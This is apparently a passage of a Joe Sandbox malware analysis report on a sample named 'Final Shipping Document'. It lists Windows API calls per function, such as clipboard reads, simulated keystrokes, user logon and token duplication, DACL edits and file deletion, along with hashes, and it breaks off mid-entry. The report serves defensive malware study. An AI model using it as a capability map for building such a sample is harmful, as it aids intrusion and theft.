                                                            • SendMessageW.USER32 ref: 00C39810
                                                            • SendMessageW.USER32(?,00001030,?,00C37E95), ref: 00C39918
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C3992E
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C39941
                                                            • SetCapture.USER32(?), ref: 00C3994A
                                                            • ClientToScreen.USER32(?,?), ref: 00C399AF
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C399BC
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C399D6
                                                            • ReleaseCapture.USER32 ref: 00C399E1
                                                            • GetCursorPos.USER32(?), ref: 00C39A19
                                                            • ScreenToClient.USER32(?,?), ref: 00C39A26
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C39A80
                                                            • SendMessageW.USER32 ref: 00C39AAE
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C39AEB
                                                            • SendMessageW.USER32 ref: 00C39B1A
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C39B3B
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C39B4A
                                                            • GetCursorPos.USER32(?), ref: 00C39B68
                                                            • ScreenToClient.USER32(?,?), ref: 00C39B75
                                                            • GetParent.USER32(?), ref: 00C39B93
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C39BFA
                                                            • SendMessageW.USER32 ref: 00C39C2B
                                                            • ClientToScreen.USER32(?,?), ref: 00C39C84
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C39CB4
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C39CDE
                                                            • SendMessageW.USER32 ref: 00C39D01
                                                            • ClientToScreen.USER32(?,?), ref: 00C39D4E
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C39D82
                                                              • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C39E05
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3429851547-4164748364
                                                            • Opcode ID: 3df74d4563ddc5ca1a98571fa8d6d019600d32d5bf2b6da34b7487a93eee6d5d
                                                            • Instruction ID: 44eb61b8c8d0c5f2ad4016222db4732a933fbf9ffb495dad83f0e73121cbfec0
                                                            • Opcode Fuzzy Hash: 3df74d4563ddc5ca1a98571fa8d6d019600d32d5bf2b6da34b7487a93eee6d5d
                                                            • Instruction Fuzzy Hash: F9429D30225600AFD724CF28CC85FAABBF5FF49310F144619FAA9972A1D7B1A950CF91
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00C348F3
                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00C34908
                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00C34927
                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00C3494B
                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00C3495C
                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00C3497B
                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00C349AE
                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00C349D4
                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00C34A0F
                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C34A56
                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C34A7E
                                                            • IsMenu.USER32(?), ref: 00C34A97
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C34AF2
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C34B20
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C34B94
                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00C34BE3
                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00C34C82
                                                            • wsprintfW.USER32 ref: 00C34CAE
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C34CC9
                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00C34CF1
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C34D13
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C34D33
                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00C34D5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 4054740463-328681919
                                                            • Opcode ID: abeafa2571e5fd95e846aa9494282903af8228281222b6e2f5c925be4c5ec07b
                                                            • Instruction ID: c72c2e1ee7cd4d64845e6dbd2c49cf0b99fb17f8a84928fffbf25588f27438f9
                                                            • Opcode Fuzzy Hash: abeafa2571e5fd95e846aa9494282903af8228281222b6e2f5c925be4c5ec07b
                                                            • Instruction Fuzzy Hash: 2512F171620214ABEB288F65CC49FBE7BF8EF49310F144169F525EB2E1DB74AA41CB50
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00BBF998
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BFF474
                                                            • IsIconic.USER32(00000000), ref: 00BFF47D
                                                            • ShowWindow.USER32(00000000,00000009), ref: 00BFF48A
                                                            • SetForegroundWindow.USER32(00000000), ref: 00BFF494
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFF4AA
                                                            • GetCurrentThreadId.KERNEL32 ref: 00BFF4B1
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFF4BD
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFF4CE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFF4D6
                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00BFF4DE
                                                            • SetForegroundWindow.USER32(00000000), ref: 00BFF4E1
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF4F6
                                                            • keybd_event.USER32(00000012,00000000), ref: 00BFF501
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF50B
                                                            • keybd_event.USER32(00000012,00000000), ref: 00BFF510
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF519
                                                            • keybd_event.USER32(00000012,00000000), ref: 00BFF51E
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF528
                                                            • keybd_event.USER32(00000012,00000000), ref: 00BFF52D
                                                            • SetForegroundWindow.USER32(00000000), ref: 00BFF530
                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00BFF557
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: 33fb5981e8e9c6ee20ab1be1fb300216914e29b34f64a3c1c845d7491ef6f1ea
                                                            • Instruction ID: 1ca2853e8765c7c3d576de6e263bbbf33c239e56d331c7fe2371393aed35b0b5
                                                            • Opcode Fuzzy Hash: 33fb5981e8e9c6ee20ab1be1fb300216914e29b34f64a3c1c845d7491ef6f1ea
                                                            • Instruction Fuzzy Hash: FD311E71A50219BBEB216BB55C8AFBF7EACEB44B50F100065FA01F61D1C6B19910ABA0
                                                            APIs
                                                              • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                              • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                              • Part of subcall function 00C016C3: GetLastError.KERNEL32 ref: 00C0174A
                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C01286
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C012A8
                                                            • CloseHandle.KERNEL32(?), ref: 00C012B9
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C012D1
                                                            • GetProcessWindowStation.USER32 ref: 00C012EA
                                                            • SetProcessWindowStation.USER32(00000000), ref: 00C012F4
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C01310
                                                              • Part of subcall function 00C010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C011FC), ref: 00C010D4
                                                              • Part of subcall function 00C010BF: CloseHandle.KERNEL32(?,?,00C011FC), ref: 00C010E9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                            • String ID: $default$winsta0
                                                            • API String ID: 22674027-1027155976
                                                            • Opcode ID: 3e58d34f736ec69daa267d072fae251c82be37ac81154fb80bbe2ab028170df8
                                                            • Instruction ID: da30c6110964fbde314fec59c962c071aab0310094489e4c09208dde435f6f49
                                                            • Opcode Fuzzy Hash: 3e58d34f736ec69daa267d072fae251c82be37ac81154fb80bbe2ab028170df8
                                                            • Instruction Fuzzy Hash: DF818971910209AFDF219FA5DC89FEEBBB9EF04704F184129FD20B61A0D7758A54CB21
                                                            APIs
                                                              • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                              • Part of subcall function 00C010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                              • Part of subcall function 00C010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                              • Part of subcall function 00C010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                              • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C00BCC
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C00C00
                                                            • GetLengthSid.ADVAPI32(?), ref: 00C00C17
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C00C51
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C00C6D
                                                            • GetLengthSid.ADVAPI32(?), ref: 00C00C84
                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C00C8C
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C00C93
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C00CB4
                                                            • CopySid.ADVAPI32(00000000), ref: 00C00CBB
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C00CEA
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C00D0C
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C00D1E
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D45
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00D4C
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D55
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00D5C
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D65
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00D6C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C00D78
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00D7F
                                                              • Part of subcall function 00C01193: GetProcessHeap.KERNEL32(00000008,00C00BB1,?,00000000,?,00C00BB1,?), ref: 00C011A1
                                                              • Part of subcall function 00C01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C00BB1,?), ref: 00C011A8
                                                              • Part of subcall function 00C01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C00BB1,?), ref: 00C011B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 4175595110-0
                                                            • Opcode ID: c180272a12cb1cd2077a3d7c837e8e7827a58134aa0070507f4a2fbc3ebbb454
                                                            • Instruction ID: d61d9da36caa3073739ab7af1eb5b95033a4706bd4f4773ca92157847cb0242d
                                                            • Opcode Fuzzy Hash: c180272a12cb1cd2077a3d7c837e8e7827a58134aa0070507f4a2fbc3ebbb454
                                                            • Instruction Fuzzy Hash: 3771497690020AABDF10DFA4DC84FAEBBB9BF04310F254519E925B6291D775AA05CBB0
                                                            APIs
                                                            • OpenClipboard.USER32(00C3CC08), ref: 00C1EB29
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C1EB37
                                                            • GetClipboardData.USER32(0000000D), ref: 00C1EB43
                                                            • CloseClipboard.USER32 ref: 00C1EB4F
                                                            • GlobalLock.KERNEL32(00000000), ref: 00C1EB87
                                                            • CloseClipboard.USER32 ref: 00C1EB91
                                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C1EBBC
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00C1EBC9
                                                            • GetClipboardData.USER32(00000001), ref: 00C1EBD1
                                                            • GlobalLock.KERNEL32(00000000), ref: 00C1EBE2
                                                            • GlobalUnlock.KERNEL32(00000000,?), ref: 00C1EC22
                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C1EC38
                                                            • GetClipboardData.USER32(0000000F), ref: 00C1EC44
                                                            • GlobalLock.KERNEL32(00000000), ref: 00C1EC55
                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C1EC77
                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C1EC94
                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C1ECD2
                                                            • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00C1ECF3
                                                            • CountClipboardFormats.USER32 ref: 00C1ED14
                                                            • CloseClipboard.USER32 ref: 00C1ED59
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                            • String ID:
                                                            • API String ID: 420908878-0
                                                            • Opcode ID: 4938dbfad2bc83f8f08797337ccb264e9daa77da7e75d50145a39d9e59a62d1c
                                                            • Instruction ID: d55eae1b019832b8122d72694fa83212786bd537139e8593c099aba2e33818d7
                                                            • Opcode Fuzzy Hash: 4938dbfad2bc83f8f08797337ccb264e9daa77da7e75d50145a39d9e59a62d1c
                                                            • Instruction Fuzzy Hash: 0F61C1352082019FD300EF24D889FAE77E4AF86714F08455DF856E72A1DB31DA85DB62
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C169BE
                                                            • FindClose.KERNEL32(00000000), ref: 00C16A12
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C16A4E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C16A75
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C16AB2
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C16ADF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                            • API String ID: 3830820486-3289030164
                                                            • Opcode ID: 70793cb70c1016e29ba98b11ac890994ef8086a4aa631f90c03823c2a6e63f8a
                                                            • Instruction ID: 6f94f553603abdc589d72ce8bb3b7d927a87dc74b15f8ec48a4fe8eb343acf1e
                                                            • Opcode Fuzzy Hash: 70793cb70c1016e29ba98b11ac890994ef8086a4aa631f90c03823c2a6e63f8a
                                                            • Instruction Fuzzy Hash: 67D15DB2508300AFC310EBA4CC91EAFB7ECAF89704F04495DF599D6191EB75DA48DB62
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C19663
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C196A1
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00C196BB
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C196D3
                                                            • FindClose.KERNEL32(00000000), ref: 00C196DE
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C196FA
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C1974A
                                                            • SetCurrentDirectoryW.KERNEL32(00C66B7C), ref: 00C19768
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C19772
                                                            • FindClose.KERNEL32(00000000), ref: 00C1977F
                                                            • FindClose.KERNEL32(00000000), ref: 00C1978F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1409584000-438819550
                                                            • Opcode ID: b5c31a544032aa073276534e4961cdb93480b8865885290d1dbe4d3309eb060b
                                                            • Instruction ID: 3a9a0b60acf1f460e8aaf9ce011ecd172f3d2155b78eb80ec440f34726d194ce
                                                            • Opcode Fuzzy Hash: b5c31a544032aa073276534e4961cdb93480b8865885290d1dbe4d3309eb060b
                                                            • Instruction Fuzzy Hash: 4E31D332500219ABDB24AFB4DC99FDE77ACDF4A320F104165F815E20E0DB31DE809B60
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C197BE
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C19819
                                                            • FindClose.KERNEL32(00000000), ref: 00C19824
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C19840
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C19890
                                                            • SetCurrentDirectoryW.KERNEL32(00C66B7C), ref: 00C198AE
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C198B8
                                                            • FindClose.KERNEL32(00000000), ref: 00C198C5
                                                            • FindClose.KERNEL32(00000000), ref: 00C198D5
                                                              • Part of subcall function 00C0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C0DB00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 2640511053-438819550
                                                            • Opcode ID: facc63f291ef0c9fd9bdd9e9057bf69f64cc36623f9d1f88e86df9c8b9245f78
                                                            • Instruction ID: f943555f709fbd82b222a49a15144ef98f9a11497e6672cf628cab04d38663fb
                                                            • Opcode Fuzzy Hash: facc63f291ef0c9fd9bdd9e9057bf69f64cc36623f9d1f88e86df9c8b9245f78
                                                            • Instruction Fuzzy Hash: 283185325406196EEB20EFB4EC98BDE77ACDF47320F144165E824A21E0DB31DAC5EB64
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 00C18257
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C18267
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C18273
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C18310
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18324
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18356
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C1838C
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18395
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                            • String ID: *.*
                                                            • API String ID: 1464919966-438819550
                                                            • Opcode ID: e5c3d461f58e39a9e65955bcfaebec0e837790dd2df9ab95f0f9138bd72e6eee
                                                            • Instruction ID: db47ca176db92781213603e950349ff63ab42132d4214fbf9331bb1952778c32
                                                            • Opcode Fuzzy Hash: e5c3d461f58e39a9e65955bcfaebec0e837790dd2df9ab95f0f9138bd72e6eee
                                                            • Instruction Fuzzy Hash: 2C616D725083059FC710EF64C894A9EB3E8FF8A310F44495EF99997251DB31EA49CB92
                                                            APIs
                                                              • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                              • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C0D122
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C0D1DD
                                                            • MoveFileW.KERNEL32(?,?), ref: 00C0D1F0
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D20D
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0D237
                                                              • Part of subcall function 00C0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C0D21C,?,?), ref: 00C0D2B2
                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 00C0D253
                                                            • FindClose.KERNEL32(00000000), ref: 00C0D264
                                                            Strings
                                                            Memory Dump Source
